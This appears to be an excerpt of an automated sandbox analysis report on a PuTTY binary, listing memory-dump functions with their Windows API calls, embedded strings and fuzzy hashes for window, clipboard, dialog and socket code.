Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Close$CreateOpen
String ID:
API String ID: 1299239824-0
Opcode ID: 870e9a0ceeac534a89269990147b3ef9ef6847470bc10b8a4cd05a67cf062222
Instruction ID: cd77569d91517338bdd3ebbcb73b050a71b287ae9446e57754897dd8645f60c5
Opcode Fuzzy Hash: 870e9a0ceeac534a89269990147b3ef9ef6847470bc10b8a4cd05a67cf062222
Instruction Fuzzy Hash: F221D8307083226BE3104B15DD85B7BBFE8EF85B54F04406EF849A7391D770AC41D695

Function 00BBDC20 Relevance: 6.0, APIs: 4, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDialogParamA.USER32(0000006F,00000000,00BBDC60,00000000,?), ref: 00BBDC32
ShowWindow.USER32(00000000,00000000), ref: 00BBDC3D
SetActiveWindow.USER32(00000000), ref: 00BBDC44
KiUserCallbackDispatcher.NTDLL(00000000), ref: 00BBDC4B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$ActiveCallbackCreateDialogDispatcherParamShowUser
String ID:
API String ID: 916146323-0
Opcode ID: e9680cba46a9192898cdef7049e488d12364838750ebbf675ca141bfc5bc7b4f
Instruction ID: ee106865189e610dd601d6090354641dc1279b9b7f621783eb6ad6a1e461149b
Opcode Fuzzy Hash: e9680cba46a9192898cdef7049e488d12364838750ebbf675ca141bfc5bc7b4f
Instruction Fuzzy Hash: B6D09E35285624BBD6212B64BD1DF9D3E64EF05751F140065F601E60F48AE558538658

Function 00BC3C70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,00000000), ref: 00BC3CFC

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3CB5, 00BC3D33
false && "bad control type in label_change", xrefs: 00BC3D38

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$false && "bad control type in label_change"
API String ID: 3367045223-102374585
Opcode ID: 2a2cd0f767481d49eb0b84ed5dd5851e19032ef32e610a49cf5127128b7fc7b9
Instruction ID: 32454a87c89c8aa156649fe73eb7b83ed44c3d8ba3b18b8b9f1f7cf0c15d9dba
Opcode Fuzzy Hash: 2a2cd0f767481d49eb0b84ed5dd5851e19032ef32e610a49cf5127128b7fc7b9
Instruction Fuzzy Hash: BD212D72604244ABCB20DB24DD86F2B77E5EBC6B15F1A80BDF81997242DB31ED098701

Function 00BC3770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BC37F7

Strings

c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00BC37BC
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC37B7

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemMessageSend
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-2883471717
Opcode ID: e6c9aa57774379217855da25c920c75430fb8cc6ba2c4dd7f4295605d32fdd5f
Instruction ID: e679045098579fcb62eeb770be2ede224e704aac92335fdfd0f1c32d665932d6
Opcode Fuzzy Hash: e6c9aa57774379217855da25c920c75430fb8cc6ba2c4dd7f4295605d32fdd5f
Instruction Fuzzy Hash: 6E1125F0600205AFDB208B04CC85F32B3E5EB89B14F4581AFE105436A0D771AD44C791

Function 00BC3510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00BC358A

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC356E
c && c->ctrl->type == CTRL_EDITBOX, xrefs: 00BC3573

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
API String ID: 3367045223-587671386
Opcode ID: ae97792db7083072125001bc721339c1d59980821573969f3b0cbaf4e85071eb
Instruction ID: b4e97edf51b33387f1cf566e3477e91871a92ff9048c40d881ece18d068ffa3a
Opcode Fuzzy Hash: ae97792db7083072125001bc721339c1d59980821573969f3b0cbaf4e85071eb
Instruction Fuzzy Hash: B9018F72204605EFD710CA58D9C1F5AB3E8FB59B08F4140AAF94493211D372ED158BA1

Function 00C56961 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00C55C5B,19E850E8,?,00C55C5B,00000220,?,00C4FB84,19E850E8), ref: 00C56993

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b4023b83bb5a74e3387e1c846f2731337d356251e54359262d1a42f82d5e2f23
Instruction ID: c91feb582f04e239a37c4bd8bab3198f86a442f3ffb149464e7356b866ecb9d9
Opcode Fuzzy Hash: b4023b83bb5a74e3387e1c846f2731337d356251e54359262d1a42f82d5e2f23
Instruction Fuzzy Hash: DBE02B3A10021097E7212B659C04F5EB748AF413B2FA50131EC2E97291DF30DDC451ED

Function 00BDBFB0 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08810: GetSystemDirectoryA.KERNEL32(00000000,?), ref: 00C08822
Part of subcall function 00C08810: GetSystemDirectoryA.KERNEL32(00000000), ref: 00C08866

Part of subcall function 00BD8B80: _strlen.LIBCMT ref: 00BD8B97
Part of subcall function 00BD8B80: _strlen.LIBCMT ref: 00BD8BC1
Part of subcall function 00BD8B80: _strlen.LIBCMT ref: 00BD8BF5
Part of subcall function 00BD8B80: _strlen.LIBCMT ref: 00BD8C1B

LoadLibraryA.KERNELBASE(00000000,00000000,?,00BEA190,kernel32.dll), ref: 00BDBFCF

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen$DirectorySystem$LibraryLoad
String ID:
API String ID: 2116201098-0
Opcode ID: 8e890f267d23c8a84490f889b07db67fd12aff37c8d96bb501409a0ef10e574a
Instruction ID: 464b013aa40b5afc00b2aeeb224477c6f5280eb2d1cf31f73e00411b6a483163
Opcode Fuzzy Hash: 8e890f267d23c8a84490f889b07db67fd12aff37c8d96bb501409a0ef10e574a
Instruction Fuzzy Hash: EBD05BB6A0111027D51032257C0EF9F655CDF827A5F094576F905D7342ED715D0182E5

Non-executed Functions

Function 00BA48D7 Relevance: 124.9, APIs: 52, Strings: 19, Instructions: 698windowtimeCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00BA49D1
GetClientRect.USER32(00000000,?), ref: 00BA49DD
CreateWindowExW.USER32(?,00000000,00C89E26,00C89E26,80000000,80000000,?,?,00000000,00000000,?,00000000), ref: 00BA4B01
GetLastError.KERNEL32 ref: 00BA4B10
GetDC.USER32 ref: 00BA4BC3
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BA4BD4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BA4BDE
ReleaseDC.USER32(00000000), ref: 00BA4BEC
GetWindowRect.USER32(?), ref: 00BA4D65
GetClientRect.USER32(?), ref: 00BA4D76
SetWindowPos.USER32(00000000,00000000,00000000,?,?,0000000E), ref: 00BA4E00
CreateBitmap.GDI32(00000001,00000001,00000000), ref: 00BA4E4F
CreateCaret.USER32 ref: 00BA4E7B
SetScrollInfo.USER32(00000001,?,00000000), ref: 00BA4EC2
GetDoubleClickTime.USER32 ref: 00BA4EDC
GetSystemMenu.USER32(00000000), ref: 00BA4EEF
CreatePopupMenu.USER32 ref: 00BA4EFA
AppendMenuA.USER32(00000000,00000000,00000190,&Copy), ref: 00BA4F18
AppendMenuA.USER32(00000000,000001A0,&Paste), ref: 00BA4F2C
CreateMenu.USER32 ref: 00BA4F2E
DeleteMenu.USER32(00000000,00000400), ref: 00BA4F5D
AppendMenuA.USER32(00000000,00001000,?), ref: 00BA4F91
AppendMenuA.USER32(00000001,00001000,(No sessions)), ref: 00BA4FC6
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00BA502D
AppendMenuA.USER32(?,00000000,00000010,&Event Log), ref: 00BA5039
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00BA5045
AppendMenuA.USER32(?,00000000,00000020,Ne&w Session...), ref: 00BA5051
AppendMenuA.USER32(?,00000000,00000030,&Duplicate Session), ref: 00BA505D
AppendMenuA.USER32(?,00000010,Sa&ved Sessions), ref: 00BA506D
AppendMenuA.USER32(?,00000000,00000050,Chan&ge Settings...), ref: 00BA5079
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00BA5085
AppendMenuA.USER32(?,00000000,00000170,C&opy All to Clipboard), ref: 00BA5094
AppendMenuA.USER32(?,00000000,00000060,C&lear Scrollback), ref: 00BA50A0
AppendMenuA.USER32(?,00000000,00000070,Rese&t Terminal), ref: 00BA50AC
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00BA50B8

Strings

term->mouse_select_clipboards[0] == CLIP_LOCAL, xrefs: 00BA4C87
&Help, xrefs: 00BA50F9
Rese&t Terminal, xrefs: 00BA50A2
Chan&ge Settings..., xrefs: 00BA506F
(No sessions), xrefs: 00BA4FB4
C&opy All to Clipboard, xrefs: 00BA5087
Ne&w Session..., xrefs: 00BA5047
(, xrefs: 00BA499B
Sa&ved Sessions, xrefs: 00BA505F
&Full Screen, xrefs: 00BA50D2
C&lear Scrollback, xrefs: 00BA5096
Unable to create terminal window: %s, xrefs: 00BA4B20
&Copy, xrefs: 00BA4F0B
&About %s, xrefs: 00BA4FE6
&Event Log, xrefs: 00BA502F
&Duplicate Session, xrefs: 00BA5053
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA4C82
Running with restricted process ACL, xrefs: 00BA511B
&Paste, xrefs: 00BA4F1A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Menu$Append$Create$Window$Rect$CapsClientDevice$BitmapCaretClickDeleteDesktopDoubleErrorInfoLastPopupReleaseScrollSystemTime
String ID: &About %s$&Copy$&Duplicate Session$&Event Log$&Full Screen$&Help$&Paste$($(No sessions)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$C&lear Scrollback$C&opy All to Clipboard$Chan&ge Settings...$Ne&w Session...$Rese&t Terminal$Running with restricted process ACL$Sa&ved Sessions$Unable to create terminal window: %s$term->mouse_select_clipboards[0] == CLIP_LOCAL
API String ID: 662650409-3101482697
Opcode ID: e555882547137e02bafcf094f6818faabfa6bc3e8266191da1be96f7b30afcd3
Instruction ID: e46694d40dedf8004e83959d02d6a6d14974545265258d7ae450c52f5570812d
Opcode Fuzzy Hash: e555882547137e02bafcf094f6818faabfa6bc3e8266191da1be96f7b30afcd3
Instruction Fuzzy Hash: B432E5B1644340BFE7209F20ED5BF6E7BE4EB46B08F000029FA05A72F1E7B1A9158B55

Function 00BA7490 Relevance: 77.9, APIs: 28, Strings: 16, Instructions: 851clipboardmemorywindowCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00BA74D4
GlobalAlloc.KERNEL32(00002002,?), ref: 00BA74EA
GlobalAlloc.KERNEL32(00002002,00000000), ref: 00BA74F8
GlobalLock.KERNEL32(00000000), ref: 00BA750D
GlobalLock.KERNEL32(00000000), ref: 00BA751E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 00BA7565
GlobalFree.KERNEL32(00000000), ref: 00BA7626
GlobalFree.KERNEL32(00000000), ref: 00BA7635
GlobalUnlock.KERNEL32(00000000), ref: 00BA76C5
GlobalFree.KERNEL32(00000000), ref: 00BA76D2
GlobalFree.KERNEL32(00000000), ref: 00BA76D5
GlobalUnlock.KERNEL32(00000000), ref: 00BA7F32
GlobalUnlock.KERNEL32(?), ref: 00BA7F39
SendMessageA.USER32(00008002,00000001,00000000), ref: 00BA7F4E
OpenClipboard.USER32 ref: 00BA7F5A
EmptyClipboard.USER32 ref: 00BA7F64
SetClipboardData.USER32(0000000D,00000000), ref: 00BA7F73
SetClipboardData.USER32(00000001,?), ref: 00BA7F78
RegisterClipboardFormatA.USER32(Rich Text Format), ref: 00BA7F86
SetClipboardData.USER32(00000000,?), ref: 00BA7F8E
CloseClipboard.USER32 ref: 00BA7F94
SendMessageA.USER32(00008002,00000000,00000000), ref: 00BA7FC2

Strings

\ul , xrefs: 00BA7CA8, 00BA7CB6
\red%d\green%d\blue%d;, xrefs: 00BA7899, 00BA78E2
{\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d, xrefs: 00BA75CD
}, xrefs: 00BA7D79
\par, xrefs: 00BA7DE2
\b0 , xrefs: 00BA7C77
\cf%d , xrefs: 00BA7B8B, 00BA7BBD
Rich Text Format, xrefs: 00BA7F81
\highlight%d , xrefs: 00BA7C14, 00BA7C42
\b , xrefs: 00BA7C72, 00BA7C83
{\uc%d\u%d, xrefs: 00BA7D62
\'%02x, xrefs: 00BA7E46
\ulnone , xrefs: 00BA7CAD
tindex + multilen <= len2, xrefs: 00BA7DA1
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA7D9C
{\colortbl ;, xrefs: 00BA7858

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Global$Clipboard$Free$DataUnlock$AllocByteCharLockMessageMultiSendWide$CloseEmptyFormatOpenRegister
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$}
API String ID: 2045886889-120354098
Opcode ID: f2d83b0ff26b11b4fa7c126a8d91f731ca0eeb9515d52596613d9f53651902e9
Instruction ID: 9977e05622100340fadceaf5ba624b69aeec2ceeff1b845ecaa4b8cff8955a9f
Opcode Fuzzy Hash: f2d83b0ff26b11b4fa7c126a8d91f731ca0eeb9515d52596613d9f53651902e9
Instruction Fuzzy Hash: D352F2B1A4C340AFD7209F24DC85B6FB7E5EB86710F1449ADF89997291EB719C00CB92

Function 00BC2470 Relevance: 48.1, APIs: 21, Strings: 6, Instructions: 828windowregistryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 00BC24A3
SetMapMode.GDI32(?,00000001), ref: 00BC2547
_strlen.LIBCMT ref: 00BC2551
GetTextExtentPoint32A.GDI32(?,?,00000000,?), ref: 00BC2564
DrawEdge.USER32(?,00000006,00000006,0000200F), ref: 00BC2577
_strlen.LIBCMT ref: 00BC2581
TextOutA.GDI32(?,?,?,?,00000000), ref: 00BC25C9
GetDC.USER32(00000000), ref: 00BC2948
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC2953
MulDiv.KERNEL32(?,00000000,00000048), ref: 00BC295F
ReleaseDC.USER32(00000000,00000000), ref: 00BC2971
_strncpy.LIBCMT ref: 00BC29E6
ChooseFontA.COMDLG32 ref: 00BC2A25
IsDlgButtonChecked.USER32(?,?), ref: 00BC2B24
SendDlgItemMessageA.USER32(?,?,00000147,00000000,00000000), ref: 00BC2D65
SendDlgItemMessageA.USER32(?,?,00000148,00000000,00000000), ref: 00BC2DAE
SetDlgItemTextA.USER32(?,?,00000000), ref: 00BC2DC5
SetCapture.USER32(?), ref: 00BC2EF2
ChooseColorA.COMDLG32(00CA4294), ref: 00BC2F96
GetDlgItemTextA.USER32(00000000,?,?,00000104), ref: 00BC2FEA
SetDlgItemTextA.USER32(?,?), ref: 00BC3093

Strings

+, xrefs: 00BC2511
gfff, xrefs: 00BC2A2F
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3051
commctrl_DragListMsg, xrefs: 00BC249E
!c->data, xrefs: 00BC3056
All Files (*.*), xrefs: 00BC2C29

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ItemText$ChooseMessageSend_strlen$ButtonCapsCaptureCheckedClipboardColorDeviceDrawEdgeExtentFontFormatModePoint32RegisterRelease_strncpy
String ID: !c->data$+$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$All Files (*.*)$commctrl_DragListMsg$gfff
API String ID: 1971161187-3869208345
Opcode ID: 53db03251236229126aa4387a072fb8179f99a06a637f0e4d79f66d4a434373d
Instruction ID: 2710246b4f8b41b3343539c6c4b8e4e2b09a815974025617956b63b387e60000
Opcode Fuzzy Hash: 53db03251236229126aa4387a072fb8179f99a06a637f0e4d79f66d4a434373d
Instruction Fuzzy Hash: 4762C0706087459FDB398F28C895FAAB7E6FF98300F5445ADE98A87391D7709C80CB52

Function 00BD64C0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 331networkCOMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 00BD64F0
socket.WS2_32(00000001,00000001,00000000), ref: 00BD6584
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00BD659D
setsockopt.WS2_32(00000000,0000FFFF,00000100,?,00000004), ref: 00BD65BF
setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00BD65DB
htons.WS2_32(00000000), ref: 00BD66C9
bind.WS2_32(?,?,00000010), ref: 00BD66DB
WSAGetLastError.WS2_32 ref: 00BD66E6
htons.WS2_32(?), ref: 00BD6761
htonl.WS2_32(?), ref: 00BD6803
htons.WS2_32(?), ref: 00BD6835
setsockopt.WS2_32(00000000,0000FFFF,00000008,?,00000004), ref: 00BD65FA

Part of subcall function 00BC5D00: WSAAsyncSelect.WS2_32(?,00000000,00008005,0000003F), ref: 00BC5D44

connect.WS2_32(?,?,00000010), ref: 00BD68CB
WSAGetLastError.WS2_32 ref: 00BD692D

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00BD67DB
sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00BD67E0

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: htonssetsockopt$ErrorLast$AsyncHandleInformationSelectbindclosesocketconnecthtonlsocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
API String ID: 115623123-386099739
Opcode ID: 8e0de2c09fb7dbc7642153f54e9208ae781f3d8578b850acb4805a4b84bd9138
Instruction ID: cee59dbd688d58103baf17182f145a72a7e2692617dcd6d15db7e3dd312fef8e
Opcode Fuzzy Hash: 8e0de2c09fb7dbc7642153f54e9208ae781f3d8578b850acb4805a4b84bd9138
Instruction Fuzzy Hash: 80D1B070504301AFD720DF24E989B5ABBE4FF98318F10496AF949873A1E775EC54CB52

Function 00BD69B0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 287networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 00BD6A56
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00BD6A6F
_strncpy.LIBCMT ref: 00BD6A90
setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000001,00000004), ref: 00BD6ABD
getaddrinfo.WS2_32(00000000,00000000,00000001,?), ref: 00BD6C33
htons.WS2_32(?), ref: 00BD6C88
bind.WS2_32(00000000,00000001,00000010), ref: 00BD6CC5
listen.WS2_32(00000000,7FFFFFFF), ref: 00BD6CD6
closesocket.WS2_32(00000000), ref: 00BD6CF3
WSAGetLastError.WS2_32 ref: 00BD6D1A

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00BD6DAF
false && "bad address family in sk_newlistener_internal", xrefs: 00BD6DB4

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ErrorHandleInformationLast_strncpybindclosesocketgetaddrinfohtonslistensetsockoptsocket
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
API String ID: 1644184481-2428366578
Opcode ID: 831440a769d3fe23afa62e74e05c958e40b30eeeaaad77a603b9a254bf0c2dbf
Instruction ID: 55f03f10df55f2d05ded42c52e6982a8a6b41c9b3b9090d46b23120bdbb42667
Opcode Fuzzy Hash: 831440a769d3fe23afa62e74e05c958e40b30eeeaaad77a603b9a254bf0c2dbf
Instruction Fuzzy Hash: D7B171B05083409FE7249F24E849B5BBBE5FF85318F14496EF8898B391E7B5D848CB52

Function 00BC5720 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 287COMMON

Download Yara Rule

APIs

